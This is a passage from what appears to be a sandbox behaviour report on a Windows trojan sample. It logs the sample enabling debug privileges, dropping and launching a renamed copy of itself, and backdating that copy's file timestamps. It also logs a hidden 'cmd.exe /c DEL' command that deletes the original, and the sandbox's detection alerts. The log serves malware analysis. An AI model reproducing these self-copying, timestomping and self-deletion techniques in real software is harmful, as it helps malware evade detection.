521.          fid (ads:): 0
522.          failure: open
523.          ntstatus: 0xc000003a
524.          CreateOptions: 0x200000
525.        apicall:
526.          timestamp: 28040
527.          sequenceNumber: 34
528.          processinfo:
529.            pid: 2312
530.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
531.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
532.          dllname: user32.dll
533.          apiname: EnumWindows
534.          address: 0x002e0eba
535.          params:
536.            param (id:1): 0x2e0e20
537.            param (id:2): 0x18f5b8
538.        apicall:
539.          timestamp: 28044
540.          sequenceNumber: 35
541.          processinfo:
542.            pid: 2312
543.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
544.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
545.          dllname: kernel32.dll
546.          apiname: Sleep
547.          address: 0x002e11cc
548.          params:
549.            param (id:1): 1100
550.        process:
551.          timestamp: 30046
552.          mode: started
553.          sequenceNumber: 36
554.          value: C:\Users\Administrator\AppData\Local\Temp\73.exe
555.          pid: 2540
556.          ppid: 2312
557.          parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
558.          cmdline: "C:\Users\Administrator\AppData\Local\Temp\73.exe"
559.          filesize: 364544
560.          md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
561.          sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
562.            ads:
563.          fid (ads:): 3377699720611042
564.        file:
565.          timestamp: 30262
566.          mode: failed
567.          sequenceNumber: 37
568.          value: C:\Windows\System32\WOW64LOG.DLL
569.          processinfo:
570.            tainted: true
571.            pid: 2540
572.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
573.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
574.            ads:
575.          fid (ads:): 0
576.          failure: open
577.          ntstatus: 0xc0000034
578.          CreateOptions: 0x200000
579.          PE:
580.            InspectionType: Ext
581.        process:
582.          timestamp: 30266
583.          mode: terminated
584.          sequenceNumber: 38
585.          value: C:\Users\Administrator\AppData\Local\Temp\73.exe
586.          pid: 2312
587.          ppid: 1092
588.          parentname: C:\Windows\explorer.exe
589.          cmdline: N/A
590.            ads:
591.          fid (ads:): 3377699720611042
592.        file:
593.          timestamp: 30271
594.          mode: failed
595.          sequenceNumber: 39
596.          value: C:\Users\Administrator\AppData\Local\Temp\MPR.DLL
597.          processinfo:
598.            tainted: true
599.            pid: 2540
600.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
601.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
602.            ads:
603.          fid (ads:): 0
604.          failure: open
605.          ntstatus: 0xc0000034
606.          CreateOptions: 0x200000
607.          PE:
608.            InspectionType: Ext
609.        regkey:
610.          randomized: true
611.          mode: queryvalue
612.          sequenceNumber: 40
613.          timestamp: 30783
614.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
615.           processinfo:
616.             pid: 2540
617.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
618.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
619.         file:
620.           timestamp: 30791
621.           mode: failed
622.           sequenceNumber: 41
623.           value: C:\Windows\SysWOW64\RPCSS.DLL
624.           processinfo:
625.             tainted: true
626.             pid: 2540
627.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
628.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
629.             ads:
630.           fid (ads:): 0
631.           failure: open
632.           ntstatus: 0xc0000034
633.           CreateOptions: 0x200000
634.           PE:
635.             InspectionType: Ext
636.         apicall:
637.           timestamp: 30795
638.           sequenceNumber: 42
639.           processinfo:
640.             pid: 2540
641.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
642.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
643.           dllname: kernel32.dll
644.           apiname: Sleep
645.           address: 0x0042207d
646.           params:
647.             param (id:1): 15
648.         apicall:
649.           timestamp: 30810
650.           sequenceNumber: 43
651.           processinfo:
652.             pid: 2540
653.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
654.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
655.           dllname: kernel32.dll
656.           apiname: Sleep
657.           address: 0x0042207d
658.           params:
659.             param (id:1): 15
660.         apicall:
661.           timestamp: 30814
662.           sequenceNumber: 44
663.           processinfo:
664.             pid: 2540
665.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
666.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
667.           dllname: kernel32.dll
668.           apiname: Sleep
669.           address: 0x0042207d
670.           params:
671.             param (id:1): 15
672.         apicall:
673.           timestamp: 30826
674.           sequenceNumber: 45
675.           processinfo:
676.             pid: 2540
677.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
678.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
679.           dllname: kernel32.dll
680.           apiname: Sleep
681.           address: 0x0042207d
682.           params:
683.             param (id:1): 15
684.         apicall:
685.           timestamp: 30841
686.           sequenceNumber: 46
687.           processinfo:
688.             pid: 2540
689.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
690.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
691.           dllname: kernel32.dll
692.           apiname: Sleep
693.           address: 0x0042207d
694.           params:
695.             param (id:1): 15
696.         apicall:
697.           timestamp: 30857
698.           sequenceNumber: 47
699.           processinfo:
700.             pid: 2540
701.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
702.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
703.           dllname: kernel32.dll
704.           apiname: Sleep
705.           address: 0x0042207d
706.           params:
707.             param (id:1): 15
708.         apicall:
709.           timestamp: 30869
710.           sequenceNumber: 48
711.           processinfo:
712.             pid: 2540
713.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
714.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
715.           dllname: kernel32.dll
716.           apiname: Sleep
717.           address: 0x0042207d
718.           params:
719.             param (id:1): 15
720.         apicall:
721.           timestamp: 30873
722.           sequenceNumber: 49
723.           processinfo:
724.             pid: 2540
725.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
726.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
727.           dllname: kernel32.dll
728.           apiname: Sleep
729.           address: 0x0042207d
730.           params:
731.             param (id:1): 15
732.         apicall:
733.           timestamp: 30888
734.           sequenceNumber: 50
735.           processinfo:
736.             pid: 2540
737.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
738.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
739.           dllname: kernel32.dll
740.           apiname: Sleep
741.           address: 0x0042207d
742.           params:
743.             param (id:1): 15
744.         apicall:
745.           timestamp: 30897
746.           sequenceNumber: 51
747.           processinfo:
748.             pid: 2540
749.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
750.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
751.           dllname: kernel32.dll
752.           apiname: GetSystemDirectoryW
753.           address: 0x7732f96e
754.           params:
755.             param (id:1): 0x77396420
756.             param (id:2): 260
757.         mutex:
758.           timestamp: 30899
759.           sequenceNumber: 52
760.           value: \Sessions\1\BaseNamedObjects\DBWinMutex
761.           processinfo:
762.             pid: 2540
763.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
764.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
765.         mutex:
766.           timestamp: 31560
767.           sequenceNumber: 53
768.           value: \Sessions\1\BaseNamedObjects\AMResourceMutex3
769.           processinfo:
770.             pid: 2540
771.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
772.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
773.         file:
774.           timestamp: 32030
775.           mode: failed
776.           sequenceNumber: 54
777.           value: C:\Users\Administrator\AppData\Local\Temp\DWMAPI.DLL
778.           processinfo:
779.             tainted: true
780.             pid: 2540
781.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
782.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
783.             ads:
784.           fid (ads:): 0
785.           failure: open
786.           ntstatus: 0xc0000034
787.           CreateOptions: 0x200000
788.           PE:
789.             InspectionType: Ext
790.         file:
791.           timestamp: 32198
792.           mode: failed
793.           sequenceNumber: 55
794.           value: C:\Users\Administrator\AppData\Local\Temp\MSVFW32.DLL
795.           processinfo:
796.             tainted: true
797.             pid: 2540
798.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
799.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
800.             ads:
801.           fid (ads:): 0
802.           failure: open
803.           ntstatus: 0xc0000034
804.           CreateOptions: 0x200000
805.           PE:
806.             InspectionType: Ext
807.         file:
808.           timestamp: 32555
809.           mode: failed
810.           sequenceNumber: 56
811.           value: C:\Users\Administrator\AppData\Local\Temp\PROFAPI.DLL
812.           processinfo:
813.             tainted: true
814.             pid: 2540
815.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
816.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
817.             ads:
818.           fid (ads:): 0
819.           failure: open
820.           ntstatus: 0xc0000034
821.           CreateOptions: 0x200000
822.           PE:
823.             InspectionType: Ext
824.         apicall:
825.           timestamp: 32698
826.           sequenceNumber: 57
827.           processinfo:
828.             pid: 2540
829.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
830.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
831.           dllname: ntdll.dll
832.           apiname: NtAdjustPrivilegesToken
833.           address: 0x7584ca4f
834.           params:
835.             param (id:1): SeDebugPrivilege
836.             param (id:2): Enabled
837.         apicall:
838.           timestamp: 32698
839.           sequenceNumber: 58
840.           processinfo:
841.             pid: 2540
842.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
843.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
844.           dllname: advapi32.dll
845.           apiname: GetTokenInformation
846.           address: 0x0041e684
847.           params:
848.             param (id:1): 0x1a0
849.             param (id:2): 0x19
850.         apicall:
851.           timestamp: 32699
852.           sequenceNumber: 59
853.           processinfo:
854.             pid: 2540
855.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
856.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
857.           dllname: advapi32.dll
858.           apiname: GetTokenInformation
859.           address: 0x0041e6c6
860.           params:
861.             param (id:1): 0x1a0
862.             param (id:2): 0x19
863.         apicall:
864.           timestamp: 32699
865.           sequenceNumber: 60
866.           processinfo:
867.             pid: 2540
868.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
869.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
870.           dllname: kernel32.dll
871.           apiname: Sleep
872.           address: 0x0042207d
873.           params:
874.             param (id:1): 15
875.         apicall:
876.           timestamp: 32710
877.           sequenceNumber: 61
878.           processinfo:
879.             pid: 2540
880.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
881.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
882.           dllname: kernel32.dll
883.           apiname: Sleep
884.           address: 0x0042207d
885.           params:
886.             param (id:1): 15
887.         apicall:
888.           timestamp: 32749
889.           sequenceNumber: 62
890.           processinfo:
891.             pid: 2540
892.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
893.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
894.           dllname: kernel32.dll
895.           apiname: Sleep
896.           address: 0x0042207d
897.           params:
898.             param (id:1): 15
899.         apicall:
900.           timestamp: 32771
901.           sequenceNumber: 63
902.           processinfo:
903.             pid: 2540
904.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
905.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
906.           dllname: kernel32.dll
907.           apiname: Sleep
908.           address: 0x0042207d
909.           params:
910.             param (id:1): 15
911.         apicall:
912.           timestamp: 32807
913.           sequenceNumber: 64
914.           processinfo:
915.             pid: 2540
916.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
917.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
918.           dllname: kernel32.dll
919.           apiname: Sleep
920.           address: 0x0042207d
921.           params:
922.             param (id:1): 15
923.         file:
924.           timestamp: 32832
925.           mode: failed
926.           sequenceNumber: 65
927.           value: C:\Users\Administrator\AppData\Roaming\73.EXE
928.           processinfo:
929.             tainted: true
930.             pid: 2540
931.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
932.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
933.             ads:
934.           fid (ads:): 0
935.           failure: open
936.           ntstatus: 0xc0000034
937.           CreateOptions: 0x60
938.           PE:
939.             InspectionType: Ext
940.         file:
941.           timestamp: 32904
942.           type: dropped_executable
943.           mode: created
944.           sequenceNumber: 66
945.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
946.           processinfo:
947.             tainted: true
948.             pid: 2540
949.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
950.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
951.             ads:
952.           fid (ads:): 3096224743903578
953.           ntstatus: 0x0
954.           CreateOptions: 0x44
955.           PE:
956.             InspectionType: Ext
957.         malicious-alert:
958.           classtype: Malicious-Directory
959.           weight: 0
960.           ruleid: 2213 : Executable file created in suspicious location ; Process creating executable file in suspicious location
961.           msg: Process creating executable file in suspicious location
962.           display-msg: Executable file created in suspicious location
963.         malicious-alert:
964.           classtype: misc-anom
965.           weight: 100
966.           ruleid: 10048 : Generic Trojan Behavior ; Generic Trojan Behavior
967.           msg: Generic Trojan Behavior
968.           display-msg: Generic Trojan Behavior
969.         file:
970.           timestamp: 32967
971.           mode: open
972.           sequenceNumber: 67
973.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
974.           processinfo:
975.             tainted: true
976.             pid: 2540
977.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
978.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
979.             ads:
980.           fid (ads:): 3096224743903578
981.           ntstatus: 0x0
982.           CreateOptions: 0x64
983.           PE:
984.             InspectionType: Ext
985.         file:
986.           timestamp: 32975
987.           mode: date_change
988.           sequenceNumber: 68
989.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
990.           filesize: 364544
991.           processinfo:
992.             pid: 2540
993.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
994.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
995.           creationTime: 12/4/2015 9:43:16 PM
996.           lastWriteTime: 12/4/2015 9:43:16 PM
997.           changeTime: 12/4/2015 9:43:16 PM
998.           newCreationTime: N/A
999.           newLastWriteTime: 12/4/2015 9:43:00 PM
1000.           newChangeTime: 12/4/2015 9:43:00 PM
1001.             ads:
1002.           fid (ads:): 3096224743903578
1003.           ntstatus: 0x0
1004.           CreateOptions: 0x0
1005.         file:
1006.           timestamp: 32984
1007.           type: dropped_executable
1008.           mode: close
1009.           sequenceNumber: 69
1010.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1011.           filesize: 364544
1012.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1013.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
1014.           processinfo:
1015.             tainted: true
1016.             pid: 2540
1017.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1018.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1019.             ads:
1020.           fid (ads:): 3096224743903578
1021.           ntstatus: 0x0
1022.           CreateOptions: 0x0
1023.           PE:
1024.             InspectionType: Deep
1025.             Dll: No
1026.             Machine: 0x014c
1027.             TimeDateStamp: 0x4140dee4
1028.             Characteristics:
1029.               value: 0x010f
1030.               names:
1031.                 name: Relocation info stripped
1032.                 name: Executable
1033.                 name: Line nunbers stripped
1034.                 name: Symbols stripped
1035.                 name: 32
1036.             Magic: 0x010b
1037.             Subsystem: Windows CUI
1038.             DllCharacteristics:
1039.               value: 0x0000
1040.               names:
1041.         process:
1042.           timestamp: 33405
1043.           mode: started
1044.           sequenceNumber: 70
1045.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1046.           pid: 2824
1047.           ppid: 2540
1048.           parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
1049.           cmdline: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1050.           filesize: 364544
1051.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1052.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
1053.             ads:
1054.           fid (ads:): 3096224743903578
1055.         malicious-alert:
1056.           classtype: Process-cloned
1057.           weight: 0
1058.           ruleid: 8032 : Process clones and starts itself ; Process clones and starts itself
1059.           msg: Process clones and starts itself
1060.           display-msg: Process clones and starts itself
1061.         file:
1062.           timestamp: 33534
1063.           mode: failed
1064.           sequenceNumber: 71
1065.           value: C:\Users\Administrator\AppData\Roaming\UI\SWDRM.DLL
1066.           processinfo:
1067.             tainted: true
1068.             pid: 2540
1069.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1070.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1071.             ads:
1072.           fid (ads:): 0
1073.           failure: open
1074.           ntstatus: 0xc000003a
1075.           CreateOptions: 0x200000
1076.           PE:
1077.             InspectionType: Ext
1078.         apicall:
1079.           timestamp: 33591
1080.           sequenceNumber: 72
1081.           processinfo:
1082.             pid: 2540
1083.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1084.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1085.           dllname: Shell32.dll
1086.           apiname: ShellExecuteW
1087.           address: 0x0041f5dd
1088.           params:
1089.             param (id:1): 0x0
1090.             param (id:2): NULL
1091.             param (id:3): C:\Windows\system32\cmd.exe
1092.             param (id:4): /c DEL C:\Users\ADMINI~1\AppData\Local\Temp\73.exe
1093.             param (id:5): NULL
1094.             param (id:6): 0
1095.         malicious-alert:
1096.           classtype: Generic-Anomalous-Activity
1097.           weight: 0
1098.           ruleid: 8006 : Hidden ShellExecute call made ; Hidden ShellExecute call made
1099.           msg: Hidden ShellExecute call made
1100.           display-msg: Hidden ShellExecute call made
1101.         file:
1102.           timestamp: 33603
1103.           mode: failed
1104.           sequenceNumber: 73
1105.           value: C:\Users\Administrator\AppData\Local\Temp\PROPSYS.DLL
1106.           processinfo:
1107.             tainted: true
1108.             pid: 2540
1109.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1110.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1111.             ads:
1112.           fid (ads:): 0
1113.           failure: open
1114.           ntstatus: 0xc0000034
1115.           CreateOptions: 0x200000
1116.           PE:
1117.             InspectionType: Ext
1118.         file:
1119.           timestamp: 33754
1120.           mode: failed
1121.           sequenceNumber: 74
1122.           value: C:\Windows\System32\WOW64LOG.DLL
1123.           processinfo:
1124.             tainted: true
1125.             pid: 2824
1126.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1127.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1128.             ads:
1129.           fid (ads:): 0
1130.           failure: open
1131.           ntstatus: 0xc0000034
1132.           CreateOptions: 0x200000
1133.           PE:
1134.             InspectionType: Ext
1135.         file:
1136.           timestamp: 33857
1137.           mode: failed
1138.           sequenceNumber: 75
1139.           value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches
1140.           processinfo:
1141.             pid: 2540
1142.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1143.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1144.             ads:
1145.           fid (ads:): 0
1146.           failure: created
1147.           ntstatus: 0xc0000035
1148.           CreateOptions: 0x200021
1149.         file:
1150.           timestamp: 33864
1151.           mode: failed
1152.           sequenceNumber: 76
1153.           value: C:\Users\Administrator\AppData\Local\Temp\NTMARTA.DLL
1154.           processinfo:
1155.             tainted: true
1156.             pid: 2540
1157.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1158.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1159.             ads:
1160.           fid (ads:): 0
1161.           failure: open
1162.           ntstatus: 0xc0000034
1163.           CreateOptions: 0x200000
1164.           PE:
1165.             InspectionType: Ext
1166.         file:
1167.           timestamp: 33956
1168.           mode: failed
1169.           sequenceNumber: 77
1170.           value: C:\Users\Administrator\AppData\Local\Temp\CRYPTSP.DLL
1171.           processinfo:
1172.             tainted: true
1173.             pid: 2540
1174.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1175.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1176.             ads:
1177.           fid (ads:): 0
1178.           failure: open
1179.           ntstatus: 0xc0000034
1180.           CreateOptions: 0x200000
1181.           PE:
1182.             InspectionType: Ext
1183.         regkey:
1184.           randomized: true
1185.           mode: queryvalue
1186.           sequenceNumber: 78
1187.           timestamp: 33971
1188.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
1189.          processinfo:
1190.            pid: 2824
1191.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1192.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1193.        file:
1194.          timestamp: 33979
1195.          mode: failed
1196.          sequenceNumber: 79
1197.          value: C:\Windows\ARU2YO48QPE
1198.          processinfo:
1199.            pid: 2824
1200.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1201.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1202.            ads:
1203.          fid (ads:): 0
1204.          failure: open
1205.          ntstatus: 0xc0000034
1206.          CreateOptions: 0x60
1207.        file:
1208.          timestamp: 33983
1209.          mode: failed
1210.          sequenceNumber: 80
1211.          value: C:\Windows\Fonts\FQ2SZNG21IEC5G4
1212.          processinfo:
1213.            pid: 2824
1214.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1215.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1216.            ads:
1217.          fid (ads:): 0
1218.          failure: open
1219.          ntstatus: 0xc0000034
1220.          CreateOptions: 0x200000
1221.        file:
1222.          timestamp: 33990
1223.          mode: failed
1224.          sequenceNumber: 81
1225.          value: C:\Users\Administrator\AppData\Roaming\FQ2SZNG21IEC5G4
1226.          processinfo:
1227.            pid: 2824
1228.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1229.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1230.            ads:
1231.          fid (ads:): 0
1232.          failure: open
1233.          ntstatus: 0xc0000034
1234.          CreateOptions: 0x200000
1235.        file:
1236.          timestamp: 33995
1237.          mode: failed
1238.          sequenceNumber: 82
1239.          value: C:\Users\ADMINI~1\AppData\Local\Temp\FQ2SznG21IEC5G4
1240.          processinfo:
1241.            pid: 2824
1242.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1243.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1244.            ads:
1245.          fid (ads:): 0
1246.          failure: open
1247.          ntstatus: 0xc0000034
1248.          CreateOptions: 0x200000
1249.        file:
1250.          timestamp: 33999
1251.          mode: failed
1252.          sequenceNumber: 83
1253.          value: C:\Windows\SysWOW64\FQ2SZNG21IEC5G4
1254.          processinfo:
1255.            pid: 2824
1256.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1257.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1258.            ads:
1259.          fid (ads:): 0
1260.          failure: open
1261.          ntstatus: 0xc0000034
1262.          CreateOptions: 0x200000
1263.        file:
1264.          timestamp: 34005
1265.          mode: failed
1266.          sequenceNumber: 84
1267.          value: C:\Windows\system\FQ2SZNG21IEC5G4
1268.          processinfo:
1269.            pid: 2824
1270.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1271.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1272.            ads:
1273.          fid (ads:): 0
1274.          failure: open
1275.          ntstatus: 0xc0000034
1276.          CreateOptions: 0x200000
1277.        file:
1278.          timestamp: 34011
1279.          mode: failed
1280.          sequenceNumber: 85
1281.          value: C:\Windows\FQ2SZNG21IEC5G4
1282.          processinfo:
1283.            pid: 2824
1284.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1286.            ads:
1287.          fid (ads:): 0
1288.          failure: open
1289.          ntstatus: 0xc0000034
1290.          CreateOptions: 0x200000
1291.        file:
1292.          timestamp: 34018
1293.          mode: failed
1294.          sequenceNumber: 86
1295.          value: C:\Windows\SysWOW64\wbem\FQ2SZNG21IEC5G4
1296.          processinfo:
1297.            pid: 2824
1298.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1299.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1300.            ads:
1301.          fid (ads:): 0
1302.          failure: open
1303.          ntstatus: 0xc0000034
1304.          CreateOptions: 0x200000
1305.        file:
1306.          timestamp: 34023
1307.          mode: failed
1308.          sequenceNumber: 87
1309.          value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FQ2SZNG21IEC5G4
1310.          processinfo:
1311.            pid: 2824
1312.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1313.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1314.            ads:
1315.          fid (ads:): 0
1316.          failure: open
1317.          ntstatus: 0xc0000034
1318.          CreateOptions: 0x200000
1319.        file:
1320.          timestamp: 34029
1321.          mode: failed
1322.          sequenceNumber: 88
1323.          value: C:\Program Files (x86)\QuickTime\QTSystem\FQ2SZNG21IEC5G4
1324.          processinfo:
1325.            pid: 2824
1326.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1327.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1328.            ads:
1329.          fid (ads:): 0
1330.          failure: open
1331.          ntstatus: 0xc0000034
1332.          CreateOptions: 0x200000
1333.        file:
1334.          timestamp: 34035
1335.          mode: failed
1336.          sequenceNumber: 89
1337.          value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\FQ2SZNG21IEC5G4
1338.          processinfo:
1339.            pid: 2824
1340.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1341.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1342.            ads:
1343.          fid (ads:): 0
1344.          failure: open
1345.          ntstatus: 0xc0000034
1346.          CreateOptions: 0x200000
1347.        file:
1348.          timestamp: 34041
1349.          mode: failed
1350.          sequenceNumber: 90
1351.          value: C:\Program Files\Debugging Tools for Windows (x64)\FQ2SZNG21IEC5G4
1352.          processinfo:
1353.            pid: 2824
1354.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1355.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1356.            ads:
1357.          fid (ads:): 0
1358.          failure: open
1359.          ntstatus: 0xc0000034
1360.          CreateOptions: 0x200000
1361.        file:
1362.          timestamp: 34047
1363.          mode: failed
1364.          sequenceNumber: 91
1365.          value: C:\Windows\Fonts\R38QI00A0M0\D77273J5H4B
1366.          processinfo:
1367.            pid: 2824
1368.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1369.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1370.            ads:
1371.          fid (ads:): 0
1372.          failure: open
1373.          ntstatus: 0xc000003a
1374.          CreateOptions: 0x200000
1375.        file:
1376.          timestamp: 34051
1377.          mode: failed
1378.          sequenceNumber: 92
1379.          value: C:\Users\Administrator\AppData\Roaming\R38QI00A0M0\D77273J5H4B
1380.          processinfo:
1381.            pid: 2824
1382.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1383.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1384.            ads:
1385.          fid (ads:): 0
1386.          failure: open
1387.          ntstatus: 0xc000003a
1388.          CreateOptions: 0x200000
1389.        file:
1390.          timestamp: 34057
1391.          mode: failed
1392.          sequenceNumber: 93
1393.          value: C:\Users\ADMINI~1\AppData\Local\Temp\R38QI00a0m0\D77273j5H4b
1394.          processinfo:
1395.            pid: 2824
1396.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1397.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1398.            ads:
1399.          fid (ads:): 0
1400.          failure: open
1401.          ntstatus: 0xc000003a
1402.          CreateOptions: 0x200000
1403.        file:
1404.          timestamp: 34062
1405.          mode: failed
1406.          sequenceNumber: 94
1407.          value: C:\Windows\SysWOW64\R38QI00A0M0\D77273J5H4B
1408.          processinfo:
1409.            pid: 2824
1410.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1411.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1412.            ads:
1413.          fid (ads:): 0
1414.          failure: open
1415.          ntstatus: 0xc000003a
1416.          CreateOptions: 0x200000
1417.        file:
1418.          timestamp: 34066
1419.          mode: failed
1420.          sequenceNumber: 95
1421.          value: C:\Windows\system\R38QI00A0M0\D77273J5H4B
1422.          processinfo:
1423.            pid: 2824
1424.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1425.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1426.            ads:
1427.          fid (ads:): 0
1428.          failure: open
1429.          ntstatus: 0xc000003a
1430.          CreateOptions: 0x200000
1431.        file:
1432.          timestamp: 34071
